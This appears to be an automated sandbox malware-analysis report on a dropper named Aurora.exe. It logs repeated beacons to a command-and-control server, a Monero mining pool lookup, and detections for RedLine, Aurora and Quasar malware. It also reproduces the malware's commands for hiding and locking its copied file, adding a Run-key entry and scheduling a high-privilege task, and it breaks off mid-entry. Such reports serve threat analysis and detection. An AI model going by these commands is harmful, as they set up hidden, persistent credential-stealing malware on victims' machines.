                                  Jul 26, 2024 20:46:53.059922934 CEST4976528105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:53.066901922 CEST2810549765154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:46:53.066984892 CEST4976528105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:53.067126989 CEST4976528105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:53.074048996 CEST2810549765154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:46:53.418556929 CEST4976528105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:53.423903942 CEST2810549765154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:46:54.696863890 CEST2810549765154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:46:54.696928024 CEST4976528105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:54.697092056 CEST4976528105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:54.702224016 CEST2810549765154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:46:59.700754881 CEST4976628105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:59.855879068 CEST2810549766154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:46:59.855994940 CEST4976628105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:59.856190920 CEST4976628105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:46:59.865250111 CEST2810549766154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:00.215528965 CEST4976628105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:00.221772909 CEST2810549766154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:00.827004910 CEST144444975551.79.71.77192.168.2.4
                                  Jul 26, 2024 20:47:00.887247086 CEST4975514444192.168.2.451.79.71.77
                                  Jul 26, 2024 20:47:01.471039057 CEST2810549766154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:01.471138000 CEST4976628105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:01.471334934 CEST4976628105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:01.476174116 CEST2810549766154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:09.714128971 CEST5532649764192.64.119.108192.168.2.4
                                  Jul 26, 2024 20:47:09.714333057 CEST4976455326192.168.2.4192.64.119.108
                                  Jul 26, 2024 20:47:10.850330114 CEST144444975551.79.71.77192.168.2.4
                                  Jul 26, 2024 20:47:11.090490103 CEST4975514444192.168.2.451.79.71.77
                                  Jul 26, 2024 20:47:18.178010941 CEST4976455326192.168.2.4192.64.119.108
                                  Jul 26, 2024 20:47:18.183410883 CEST5532649764192.64.119.108192.168.2.4
                                  Jul 26, 2024 20:47:18.561255932 CEST4976728105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:18.566852093 CEST2810549767154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:18.567785025 CEST4976728105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:18.567977905 CEST4976728105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:18.573337078 CEST2810549767154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:18.918625116 CEST4976728105192.168.2.4154.81.220.233
                                  Jul 26, 2024 20:47:18.924649000 CEST2810549767154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:20.170095921 CEST2810549767154.81.220.233192.168.2.4
                                  Jul 26, 2024 20:47:20.170176029 CEST4976728105192.168.2.4154.81.220.233
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 26, 2024 20:45:08.026469946 CEST5887353192.168.2.41.1.1.1
                                  Jul 26, 2024 20:45:08.043806076 CEST53588731.1.1.1192.168.2.4
                                  Jul 26, 2024 20:45:33.169086933 CEST5836753192.168.2.41.1.1.1
                                  Jul 26, 2024 20:45:33.186791897 CEST53583671.1.1.1192.168.2.4
                                  Jul 26, 2024 20:46:06.314557076 CEST6278153192.168.2.41.1.1.1
                                  Jul 26, 2024 20:46:06.323725939 CEST53627811.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 26, 2024 20:45:08.026469946 CEST192.168.2.41.1.1.10xa8f8Standard query (0)auroraforge.artA (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:45:33.169086933 CEST192.168.2.41.1.1.10xe760Standard query (0)thesirenmika.comA (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:46:06.314557076 CEST192.168.2.41.1.1.10x211aStandard query (0)xmr-us-east1.nanopool.orgA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 26, 2024 20:45:08.043806076 CEST1.1.1.1192.168.2.40xa8f8No error (0)auroraforge.art192.64.119.108A (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:45:33.186791897 CEST1.1.1.1192.168.2.40xe760No error (0)thesirenmika.com123.123.123.123A (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:46:06.323725939 CEST1.1.1.1192.168.2.40x211aNo error (0)xmr-us-east1.nanopool.org51.222.106.253A (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:46:06.323725939 CEST1.1.1.1192.168.2.40x211aNo error (0)xmr-us-east1.nanopool.org51.79.71.77A (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:46:06.323725939 CEST1.1.1.1192.168.2.40x211aNo error (0)xmr-us-east1.nanopool.org51.222.200.133A (IP address)IN (0x0001)false
                                  Jul 26, 2024 20:46:06.323725939 CEST1.1.1.1192.168.2.40x211aNo error (0)xmr-us-east1.nanopool.org51.222.12.201A (IP address)IN (0x0001)false
                                  • 154.81.220.233:28105
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:05.513554096 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449737154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:12.240715981 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449744154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:19.366971016 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.449746154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:26.132781029 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.449747154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:32.805094004 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.449749154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:39.971077919 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.449750154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:46.597177982 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.449751154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:53.260888100 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.449754154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:45:59.879786968 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.449756154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:06.504458904 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.449757154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:13.112860918 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.449758154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:19.771882057 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.449760154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:26.428527117 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.449761154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:33.050642967 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.449762154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:39.675527096 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.449763154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:46.410274029 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.449765154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:53.067126989 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.449766154.81.220.233281056332C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:46:59.856190920 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  18192.168.2.449767154.81.220.23328105
                                  TimestampBytes transferredDirectionData
                                  Jul 26, 2024 20:47:18.567977905 CEST241OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 154.81.220.233:28105
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:14:45:00
                                  Start date:26/07/2024
                                  Path:C:\Users\user\Desktop\Aurora.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Aurora.exe"
                                  Imagebase:0xa0000
                                  File size:22'316'547 bytes
                                  MD5 hash:416DE11D210AE0FF50214021FF57B32B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Aurora, Description: Yara Aurora Stealer, Source: 00000000.00000002.2198132330.000000000A0C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Aurora, Description: Yara Aurora Stealer, Source: 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:14:45:02
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe"
                                  Imagebase:0x7ff6c12a0000
                                  File size:81'920 bytes
                                  MD5 hash:65F0A85C4B056D6BCEE60C49E2372E35
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 67%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:14:45:02
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit "
                                  Imagebase:0x7ff7e2410000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:14:45:02
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:14:45:02
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe"
                                  Imagebase:0x5e0000
                                  File size:97'792 bytes
                                  MD5 hash:C9A9D471428A5F92068C0823E6454254
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: Joe Security
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: unknown
                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 96%, ReversingLabs
                                  Reputation:low
                                  Has exited:false

                                  Target ID:5
                                  Start time:14:45:02
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:6
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe"
                                  Imagebase:0x7ff7e2410000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe"
                                  Imagebase:0xb60000
                                  File size:3'305'984 bytes
                                  MD5 hash:3B4F58CD4BCA7274BE25E885BE00798B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 68%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:8
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping localhost -n 1
                                  Imagebase:0x7ff663a70000
                                  File size:22'528 bytes
                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:10
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\attrib.exe
                                  Wow64 process (32bit):false
                                  Commandline:attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe"
                                  Imagebase:0x7ff703cb0000
                                  File size:23'040 bytes
                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:11
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\icacls.exe
                                  Wow64 process (32bit):false
                                  Commandline:icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)
                                  Imagebase:0x7ff6b22a0000
                                  File size:39'424 bytes
                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:12
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe
                                  Imagebase:0x7ff7e2410000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:14:45:03
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'
                                  Imagebase:0xb20000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:15
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:16
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:17
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:#cmd
                                  Imagebase:0xca0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:false

                                  Target ID:18
                                  Start time:14:45:04
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Msedge.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\AppData\Local\Msedge.exe
                                  Imagebase:0x7ff62b640000
                                  File size:81'920 bytes
                                  MD5 hash:65F0A85C4B056D6BCEE60C49E2372E35
                                  Has elevated privileges:true
